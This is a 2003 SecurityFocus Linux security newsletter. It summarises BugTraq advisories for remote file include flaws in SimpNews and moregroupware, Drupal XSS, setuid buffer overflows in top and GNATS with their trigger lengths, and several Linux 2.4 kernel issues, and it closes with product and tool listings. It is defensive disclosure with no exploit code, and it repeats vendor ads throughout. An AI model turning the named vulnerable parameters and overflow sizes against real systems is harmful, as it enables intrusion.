SecurityFocus Linux Newsletter #142

SecurityFocus Linux Newsletter #142

This Issue is Sponsored by: SPI Dynamics

ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step" - White Paper
It's as simple as placing additional LDAP query commands into a Web form input box giving hackers complete access to all your backend systems! Firewalls and IDS will not stop such attacks because LDAP Injections are seen as valid data.

Download this *FREE* white paper from SPI Dynamics for a complete guide to protection!
http://www.securityfocus.com/SPIDynamics-linux-secnews7

I. FRONT AND CENTER

1. "Copying is Theft ..."
2. Demonstrating ROI for Penetration Testing (Part One)
3. Detecting SQL Injection in Oracle II. LINUX VULNERABILITY SUMMARY
4. SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
5. Drupal Cross-Site Scripting Vulnerability
6. Top Home Environment Variable Local Buffer Overflow Vulnerability
7. MoreGroupWare WEBMAIL2_INC_DIR Remote File Include Vulnerability
8. WebCalendar Local File Include Information Disclosure...
9. GnuPG Group Root File Corruption Vulnerability
10. GNU GNATS Queue-PR Database Command Line Option Buffer Overflow...
11. Multiple Linux 2.4 Kernel Vulnerabilities
12. FDClone Local Insecure Temporary Directory Creation Vulnerability III. LINUX FOCUS LIST SUMMARY
13. NO NEW POSTS FOR THE WEEK ENDING 07.25.03 IV. NEW PRODUCTS FOR LINUX PLATFORMS
14. ipANGEL
15. NetMAX VPN Server Suite
16. PENS
17. NEW TOOLS FOR LINUX PLATFORMS
18. Rate v0.81
19. CalcChecksum v1.4
20. OpenVPN v1.4.2 VI. SPONSOR INFORMATION
21. FRONT AND CENTER

    ---

22. "Copying is Theft ..." By Mark Rasch

And other legal myths in the looming battle over peer-to-peer.

http://www.securityfocus.com/columnists/175

2. Demonstrating ROI for Penetration Testing (Part One) By Marcia Wilson

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

This is the first in a series of articles demonstrating ROI (return on investment) for a penetration test. You will have to step into the world of budgeting, cost justification, resource allocation, and learn a few unfamiliar terms.

http://www.securityfocus.com/infocus/1715

3. Detecting SQL Injection in Oracle
By Pete Finnigan

This paper takes the subject of SQL injection further and investigates the possibilities for the Oracle Database Administrator to detect SQL injection in the wild.

http://www.securityfocus.com/infocus/1714

II. BUGTRAQ SUMMARY

1. SimpNews PATH_SIMPNEWS Remote File Include Vulnerability BugTraq ID: 8227 Remote: Yes Date Published: Jul 18 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/8227 Summary:

SimpNews is a web news system implemented in PHP. It is available for Unix/Linux variants and Microsoft Windows operating systems.

SimpNews is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence the $path_simpnews URI variable. This variable is used in the include path for the 'config.php', 'functions.php' and 'includes/has_entries.inc' scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed. This would occur in the context of the web server. This issue exists in both the 'eventcal2.php' and 'eventscroller.php' scripts.

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

This could be exploited to execute malicious PHP commands in the context of the web server process.

It should be noted that although SimpNews versions 2.01 through 2.13 have been reported vulnerable, other versions might also be affected.

2. Drupal Cross-Site Scripting Vulnerability BugTraq ID: 8235
Remote: Yes
Date Published: Jul 21 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8235
Summary:

Drupal is an open-source content management system. Drupal is available for a number of platforms including Microsoft Windows operating systems and Unix/Linux variants.

The Drupal content management system is prone to a cross-site scripting vulnerability. This issue is exposed through the main page and through other sub-pages. An attacker may exploit this issue by including hostile HTML and script code in a malicious link to Drupal. This code may be rendered in the web browser of a user who visits the link. This would occur in the security context of the site hosting Drupal.

The attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user.

3. Top Home Environment Variable Local Buffer Overflow Vulnerability BugTraq ID: 8239
Remote: No
Date Published: Jul 22 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8239
Summary:

top is a freely available, open source process monitoring utility. It is available for various Unix and Linux platforms.

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

A buffer overflow condition has been reported in top when handling environment variables of excessive length. This may result in an attacker potentially executing arbitrary code.

The problem is in the checking of bounds on the HOME environment variable. top does not properly handle input of excessive length in the HOME environment variable. By placing a string of excessive length (1100 bytes) in this environment variable, an attacker may be able to corrupt sensitive process memory, and potentially execute arbitrary code with the privileges of the top program.

It should be noted that top is typically installed with the setuid root bit set.

Additionally, although top versions less than or equal to version 2.0.11 have been reported vulnerable, it should be noted that other versions might also be vulnerable.

4. MoreGroupWare WEBMAIL2_INC_DIR Remote File Include Vulnerability BugTraq ID: 8249
Remote: Yes
Date Published: Jul 23 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8249
Summary:

moregroupware is a tool to facilitate office communications. It includes, among other features, webmail, calendaring and project management functionality. It is implemented in PHP and is available for a variety of platforms including Microsoft Windows and Linux and Unix variant operating environments.

moregroupware is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence the $webmail2_inc_dir URI variable or in some cases the $appconf URI variable. This variable is used in the include path for the 'mimepart.php', 'pear.php' and 'mime_types.php' scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed. This would occur in the context of the web server. This issue exists in 'class.html.mime.mail.inc', 'rfc822.php' and 'webmail2_func.inc' scripts.

This could be exploited to execute malicious PHP commands in the context of the web server process.

Can't find what you're looking for?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

It should be noted that although moregroupware version 0.6.8 has been reported vulnerable, other versions might also be affected.

5. WebCalendar Local File Include Information Disclosure Vulnerability BugTraq ID: 8237
Remote: Yes
Date Published: Jul 21 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8237
Summary:

WebCalendar is a freely available, open source web calendar software package. It is available for the Unix and Linux operating systems.

It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process.

The problem is in the handling of directory traversal strings when passed to a specific variable. When a request for any PHP script is made and directory traversal strings are passed to the user_inc variable, it is possible to view a file at the end of the directory traversal string.

6. GnuPG Group Root File Corruption Vulnerability BugTraq ID: 8228
Remote: No
Date Published: Jul 19 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8228
Summary:

gnupg is an encryption utility that is available for a number of platforms, including Unix/Linux variants.

gnupg is reported to be prone to an issue that could permit a malicious local user to corrupt files owned by the root group. This issue is reportedly the result of gnupg having setgid root privileges. The issue was reported for Gentoo Linux, though other distributions may have a similar default installation and be prone to this issue.

Don't know where to look next?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

This vulnerability may potentially be exploited to corrupt critical or sensitive files for a denial of service. The possibility of privilege escalation also exists.

7. GNU GNATS Queue-PR Database Command Line Option Buffer Overflow Vulnerability
BugTraq ID: 8232
Remote: No
Date Published: Jul 21 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8232
Summary:

GNU GNATS is a freely available bug tracking system. It is available for a variety of Linux and Unix variant operating environments.

The queue-pr utility is shipped as part of GNATS and is intended as a tool, used to manage the GNATS queue. The queue-pr utility is a setuid utility typically with UID 'gnats' privileges.

A stack overflow vulnerability has been reported for the queue-pr utility. The vulnerability occurs due to insufficient bounds checks performed on the database name passed to the '-d' commandline option.

An attacker may invoke the queue-pr utility passing a malicious database name (>=1148 bytes of data), in a manner sufficient to trigger the vulnerability.

Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges.

It should be noted that on some systems, the queue-pr utility might be installed with setuid 'root' privileges.

Confused? Frustrated?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

It should be noted that although this vulnerability has been reported to affect GNATS version 3.113.1_6, other versions might be affected.

8. Multiple Linux 2.4 Kernel Vulnerabilities BugTraq ID: 8233
Remote: Yes
Date Published: Jul 21 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8233
Summary:

Red Hat has released an advisory reporting the existence of multiple vulnerabilities in the Linux 2.4 kernel. The following issues were reported:

/proc/tty/driver/serial may expose sensitive information to local attackers by revealing the exact character count for serial links. This information could permit a malicious local user to infer password lengths and the timing between keystrokes when entering passwords. This might aid in brute-force attacks that attempt to compromise another user's password.

A race condition in the implementation of the execve() system was reported. This issue is described in BID 8042.

The kernel RPC code was reported to have recently changed, causing the reuse flag on newly created sockets to be set. This introduced a vulnerability that could permit unprivileged users to bind to UDP ports used for related services, such as nfsd.

A vulnerability in the implementation of the execve() system could permit malicious local users to gain read access to restricted file descriptors. This occurs because the file descriptor of the executable process is stored in the file table of the calling process. This could be exploited to gain access to sensitive information. This is related to the race condition in execve() and is also discussed in BID 8042.

A flaw in the /proc filesystem could be exploited to gain access to sensitive information. If /proc/self entries are opened before executed a setuid program, the program may fail to change the ownership and permissions of entries that are already open.

Call Pantek today for Open Source Technical Support at 1-877-546-8934 - 24/7/365

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

The STP protocol on Red Hat was disabled due to lack of security. This could be an issue on other distributions. An additional issue with STP was reported in the kernel that may permit denial of service attacks, due to insufficient length checking.

It was reported that the kernel Forwarding table may be spoofed if forged packets are received that have the same source IP address as the host.

These issues will be divided into separate BIDs when further analysis is complete.

9. FDClone Local Insecure Temporary Directory Creation Vulnerability BugTraq ID: 8247
Remote: No
Date Published: Jul 23 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8247
Summary:

fdclone is a freely available, open source file management tool. It is available for the Linux platform.

A problem has been reported in the creation of temporary directories by fdclone. Because of this, an attacker may be able to gain access to potentially sensitive information.

The problem is in the creation of directories by the fdclone program in the /tmp directory. fdclone does not properly check for the existence of temporary directories prior to execution, and does not validate permissions on already existing directories. Because of this, an attacker may be able to gain access to the contents of temporary files created by fdclone. It may also be possible to launch symbolic link attacks with this vulnerability.

Iii. LINUX FOCUS LIST SUMMARY

1. NO NEW POSTS FOR THE WEEK ENDING 07.25.03

1. ipANGEL by Lucid Security Platforms: Os Independent Relevant URL: http://www.lucidsecurity.com/products.php Summary:

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Lucid Security's ipANGEL, coupled with Check Point FireWall-1, provides complete protection against all network and application attacks. ipANGEL marks a departure from the traditional thinking of what an intrusion prevention product should do. It detects and shields vulnerable applications without duplicating the capabilities of the firewall. Lucid Security purposefully limited ipANGEL's scope: - Operates exclusively with FireWall-1 - Does not duplicate FireWall-1's capabilities - Ignores traffic that is not an attack against vulnerable applications and systems This approach has enabled Lucid Security to focus on building the intelligence and automation that make ipANGEL easy to deploy and maintain. Together, ipANGEL and FireWall-1 actively defend against attacks in real time.

2. NetMAX VPN Server Suite
by Cybernet Systems
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT Relevant URL:
http://www.netmax.com/products/vpn_prods.html Summary:

The NetMAX VPN Server Suite simplifies Linux servers by installing a ready-to-configure network security solution consisting of a Virtual Private Network (VPN) server, firewall, router, and proxy/cache server, along with the Linux operating system. NetMAX Internet Appliance Software provides small/medium sized businesses and enterprise workgroups easy use of a browser-based administration and pre-configured suite of applications, along with the strength and reliability of Linux.

3. PENS
by Portcullis Computer Security
Platforms: Linux, Netware, Windows 2000, Windows 95/98, Windows NT Relevant URL:
http://www.securitynet.kirion.net/encryption-software/ Summary:

PENS is an on-the-fly encryption software system with either 56-bit DES or, new for Version 1.5, 128-bit IDEA and Triple DES algorithms for data encryption and 1024-bit RSA for key exchange and authentication. Users are given their own encrypted domains with which they can protect their files. They can also let other users enter these domains - should the administrator allow that - making worksharing easier. All they have to do is send their keys to the person who requires them.

V. NEW TOOLS FOR LINUX PLATFORMS

1. Rate v0.81 by mteg Relevant URL: http://s-tech.elsat.net.pl/ Platforms: FreeBSD, Linux, OpenBSD, Solaris, SunOS Summary:

Rate is a Swiss-Army-knife bandwidth measurement tool. Its primary application is calculating the bandwidth used by packets matching a given BPF packet filter expression, which can really help a network administrator see what is happening at a software-based router at the moment. Administrators can measure the traffic generated by a single host or by a whole subnet, and measure HTTP traffic, broadcast traffic, quake traffic, etc. It can also be used for generating per-IP statistics and for determining nodes that generate highest traffic; it has a special operation mode for it. Additionally, it is able to extract strings from packets based on a POSIX regular expression.

2. CalcChecksum v1.4
by Michael Buesch
Relevant URL:
http://www.8ung.at/tuxsoft/
Platforms: POSIX
Summary:

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

CalcChecksum is a simple utility for calculating various checksums easily with a graphical user interface.

3. OpenVPN v1.4.2
by James Yonan
Relevant URL:
http://openvpn.sourceforge.net/
Platforms: Linux, POSIX
Summary:

OpenVPN is a robust and highly configurable VPN (Virtual Private Network) daemon which can be used to securely link two or more private networks using an encrypted tunnel over the Internet. You can tunnel any IP subnetwork or virtual ethernet adapter over a single UDP port, use all of the encryption, authentication, and certification features of the OpenSSL library to protect your private network traffic, use any cipher, key size, or HMAC digest (for packet authentication) supported by the OpenSSL library, choose between static-key based conventional encryption or certificate-based public key encryption, use static or TLS-based dynamic key exchange, and tunnel networks whose public endpoints are dynamic such as DHCP clients or dial-in users.

VI. SPONSOR INFORMATION

ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step" - White Paper
It's as simple as placing additional LDAP query commands into a Web form input box giving hackers complete access to all your backend systems! Firewalls and IDS will not stop such attacks because LDAP Injections are seen as valid data.

Download this *FREE* white paper from SPI Dynamics for a complete guide to protection!
http://www.securityfocus.com/SPIDynamics-linux-secnews7